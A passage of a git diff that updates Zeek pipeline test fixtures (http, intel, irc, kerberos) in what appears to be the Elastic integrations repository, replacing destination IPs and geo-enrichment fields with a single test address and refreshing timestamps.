"created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CrI5Xg30caNXnNvEse", @@ -493,23 +499,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 35994, + "number": 29518, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Bredband2 AB" } }, - "address": "23.55.163.48", + "address": "89.160.20.156", "port": 80, - "ip": "23.55.163.48" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -534,7 +543,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:82rJ/b6SdSbZMEALyu9kigb2Os0=", + "community_id": "1:BZ8++u2MIGSTzB1PMApm+Z7ySCw=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:16:04.250Z", @@ -544,7 +553,7 @@ "related": { "ip": [ "10.156.0.2", - "23.55.163.48" + "89.160.20.156" ] }, "http": { @@ -562,8 +571,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259614400Z", - "original": "{\"ts\":1617081364.250251,\"uid\":\"C6oCGd24yB2dZ7y7z7\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42164,\"id.resp_h\":\"23.55.163.48\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F1imAq4yUjbwyK7NO2\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993445300Z", + "original": "{\"ts\":1617081364.250251,\"uid\":\"C6oCGd24yB2dZ7y7z7\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42164,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F1imAq4yUjbwyK7NO2\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C6oCGd24yB2dZ7y7z7", @@ -582,23 +591,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 35994, + "number": 29518, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Bredband2 AB" } }, - "address": "23.55.163.48", + "address": "89.160.20.156", "port": 80, - "ip": "23.55.163.48" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -623,7 +635,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:q4SzvspH9r4RpNUx+pCu9/vYYuQ=", + "community_id": "1:ajUcq0AI8azqE0a1li4/jRMwcKw=", "transport": "tcp" }, "@timestamp": "2021-03-30T05:16:06.285Z", @@ -633,7 +645,7 @@ "related": { "ip": [ "10.156.0.2", - "23.55.163.48" + "89.160.20.156" ] }, "http": { @@ -651,8 +663,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259620800Z", - "original": "{\"ts\":1617081366.285075,\"uid\":\"C7DWRE1zsvxUK9RyW1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42292,\"id.resp_h\":\"23.55.163.48\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FQhm6z1cISaOxMzzR6\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", + "ingested": "2021-12-09T13:51:01.993451200Z", + "original": "{\"ts\":1617081366.285075,\"uid\":\"C7DWRE1zsvxUK9RyW1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42292,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FQhm6z1cISaOxMzzR6\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C7DWRE1zsvxUK9RyW1", @@ -676,26 +688,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "address": "34.206.130.40", + "address": "89.160.20.156", "port": 80, - "ip": "34.206.130.40" + "ip": "89.160.20.156" }, "zeek": { "http": { @@ -725,7 +737,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ol0Btm49e1mxnu/BXm1GM8w5ixY=", + "community_id": "1:61UpXAOHdoCqwl0IE7pv7Zrqgig=", "transport": "tcp" }, "@timestamp": "2019-01-17T06:36:59.757Z", @@ -735,7 +747,7 @@ "related": { "ip": [ "10.20.8.197", - "34.206.130.40" + "89.160.20.156" ] }, "host": { @@ -757,8 +769,8 @@ } }, "event": { - "ingested": "2021-08-11T19:18:28.259624600Z", - "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"34.206.130.40\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", + "ingested": "2021-12-09T13:51:01.993457100Z", + "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "get", diff --git a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log index cbda884c9dc..c4b98af26dc 100644 --- a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log +++ b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log @@ -1,2 +1,2 @@ -{"ts":1573030980.989353,"uid":"Ctefoj1tgOPt4D0EK2","id.orig_h":"192.168.1.1","id.orig_p":37598,"id.resp_h":"198.41.0.4","id.resp_p":53,"seen.indicator":"198.41.0.4","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","seen.node":"worker-1-2","matched":["Intel::ADDR"],"sources":["ETPRO Rep: AbusedTLD Score: 127"]} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"198.41.0.4\",\"id.resp_p\":53,\"seen.indicator\":\"198.41.0.4\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/intel.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1573030980.989353,"uid":"Ctefoj1tgOPt4D0EK2","id.orig_h":"192.168.1.1","id.orig_p":37598,"id.resp_h":"89.160.20.156","id.resp_p":53,"seen.indicator":"89.160.20.156","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","seen.node":"worker-1-2","matched":["Intel::ADDR"],"sources":["ETPRO Rep: AbusedTLD Score: 127"]} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/intel.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json index 731a188e970..a51a678157a 100644 --- a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json +++ b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json @@ -8,28 +8,31 @@ "related": { "ip": [ "192.168.1.1", - "198.41.0.4" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 20172, + "number": 29518, "organization": { - "name": "VeriSign Global Registry Services" + "name": "Bredband2 AB" } }, - "address": "198.41.0.4", + "address": "89.160.20.156", "port": 53, - "ip": "198.41.0.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "Ctefoj1tgOPt4D0EK2", @@ -41,7 +44,7 @@ "Intel::ADDR" ], "seen": { - "indicator": "198.41.0.4", + "indicator": "89.160.20.156", "node": "worker-1-2", "indicator_type": "Intel::ADDR", "where": "Conn::IN_RESP" @@ -54,8 +57,8 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-08-11T19:18:29.535615500Z", - "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"198.41.0.4\",\"id.resp_p\":53,\"seen.indicator\":\"198.41.0.4\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", + "ingested": "2021-12-09T13:51:03.233040Z", + "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "enrichment", "id": "Ctefoj1tgOPt4D0EK2", @@ -78,23 +81,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 20172, + "number": 29518, "organization": { - "name": "VeriSign Global Registry Services" + "name": "Bredband2 AB" } }, - "address": "198.41.0.4", + "address": "89.160.20.156", "port": 53, - "ip": "198.41.0.4" + "ip": "89.160.20.156" }, "zeek": { "session_id": "Ctefoj1tgOPt4D0EK2", @@ -106,7 +112,7 @@ "Intel::ADDR" ], "seen": { - "indicator": "198.41.0.4", + "indicator": "89.160.20.156", "node": "worker-1-2", "indicator_type": "Intel::ADDR", "where": "Conn::IN_RESP" @@ -128,15 +134,15 @@ "related": { "ip": [ "192.168.1.1", - "198.41.0.4" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:29.535627700Z", - "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"198.41.0.4\",\"id.resp_p\":53,\"seen.indicator\":\"198.41.0.4\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", + "ingested": "2021-12-09T13:51:03.233049400Z", + "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "enrichment", "id": "Ctefoj1tgOPt4D0EK2", diff --git a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log index b5f66126945..6c07da778d0 100644 --- a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log +++ b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log @@ -1,4 +1,4 @@ -{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"command":"USER","value":"xxxxx","addl":"+iw xxxxx XxxxxxXxxx "} -{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"user":"xxxxx","command":"NICK","value":"molochtest","addl":"+iw xxxxx XxxxxxXxxx "} -{"ts":1387554250.706387,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"38.229.70.20","id.resp_p":8000,"nick":"molochtest","user":"xxxxx","command":"JOIN","value":"#moloch-fpc","addl":" with channel key: \u0027-\u0027"} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/irc.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"command":"USER","value":"xxxxx","addl":"+iw xxxxx XxxxxxXxxx "} +{"ts":1387554250.647295,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"user":"xxxxx","command":"NICK","value":"molochtest","addl":"+iw xxxxx XxxxxxXxxx "} +{"ts":1387554250.706387,"uid":"CNJBX5FQdL62VUUP1","id.orig_h":"10.180.156.249","id.orig_p":45921,"id.resp_h":"89.160.20.156","id.resp_p":8000,"nick":"molochtest","user":"xxxxx","command":"JOIN","value":"#moloch-fpc","addl":" with channel key: \u0027-\u0027"} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/irc.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json index 2cead2372c7..21d6fe1ad5a 100644 --- a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json +++ b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json @@ -8,28 +8,31 @@ "related": { "ip": [ "10.180.156.249", - "38.229.70.20" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 23028, + "number": 29518, "organization": { - "name": "Team Cymru Inc." + "name": "Bredband2 AB" } }, - "address": "38.229.70.20", + "address": "89.160.20.156", "port": 8000, - "ip": "38.229.70.20" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CNJBX5FQdL62VUUP1", @@ -45,8 +48,8 @@ "ip": "10.180.156.249" }, "event": { - "ingested": "2021-08-11T19:18:29.946420700Z", - "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"command\":\"USER\",\"value\":\"xxxxx\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", + "ingested": "2021-12-09T13:51:03.580323700Z", + "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"command\":\"USER\",\"value\":\"xxxxx\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "USER", @@ -65,30 +68,33 @@ ], "network": { "protocol": "irc", - "community_id": "1:YdkGov/c+KLtmg7Cf5DLDB4+YdQ=", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", "transport": "tcp" } }, { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 23028, + "number": 29518, "organization": { - "name": "Team Cymru Inc." + "name": "Bredband2 AB" } }, - "address": "38.229.70.20", + "address": "89.160.20.156", "port": 8000, - "ip": "38.229.70.20" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CNJBX5FQdL62VUUP1", @@ -108,7 +114,7 @@ ], "network": { "protocol": "irc", - "community_id": "1:YdkGov/c+KLtmg7Cf5DLDB4+YdQ=", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", "transport": "tcp" }, "@timestamp": "2013-12-20T15:44:10.647Z", @@ -121,12 +127,12 @@ ], "ip": [ "10.180.156.249", - "38.229.70.20" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:29.946433800Z", - "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"user\":\"xxxxx\",\"command\":\"NICK\",\"value\":\"molochtest\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", + "ingested": "2021-12-09T13:51:03.580332Z", + "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"user\":\"xxxxx\",\"command\":\"NICK\",\"value\":\"molochtest\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "NICK", @@ -147,23 +153,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 23028, + "number": 29518, "organization": { - "name": "Team Cymru Inc." + "name": "Bredband2 AB" } }, - "address": "38.229.70.20", + "address": "89.160.20.156", "port": 8000, - "ip": "38.229.70.20" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CNJBX5FQdL62VUUP1", @@ -184,7 +193,7 @@ ], "network": { "protocol": "irc", - "community_id": "1:YdkGov/c+KLtmg7Cf5DLDB4+YdQ=", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", "transport": "tcp" }, "@timestamp": "2013-12-20T15:44:10.706Z", @@ -197,12 +206,12 @@ ], "ip": [ "10.180.156.249", - "38.229.70.20" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:29.946442200Z", - "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", + "ingested": "2021-12-09T13:51:03.580337700Z", + "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "JOIN", @@ -228,23 +237,26 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 23028, + "number": 29518, "organization": { - "name": "Team Cymru Inc." + "name": "Bredband2 AB" } }, - "address": "38.229.70.20", + "address": "89.160.20.156", "port": 8000, - "ip": "38.229.70.20" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CNJBX5FQdL62VUUP1", @@ -265,7 +277,7 @@ ], "network": { "protocol": "irc", - "community_id": "1:YdkGov/c+KLtmg7Cf5DLDB4+YdQ=", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", "transport": "tcp" }, "@timestamp": "2013-12-20T15:44:10.706Z", @@ -278,15 +290,15 @@ ], "ip": [ "10.180.156.249", - "38.229.70.20" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:29.946450300Z", - "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"38.229.70.20\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", + "ingested": "2021-12-09T13:51:03.580343100Z", + "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "action": "JOIN", diff --git a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json index 98be875b679..c88fababaac 100644 --- a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json +++ b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json @@ -86,7 +86,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:30.597408600Z", + "ingested": "2021-12-09T13:51:04.150192Z", "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -201,7 +201,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:30.597421400Z", + "ingested": "2021-12-09T13:51:04.150196600Z", "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json 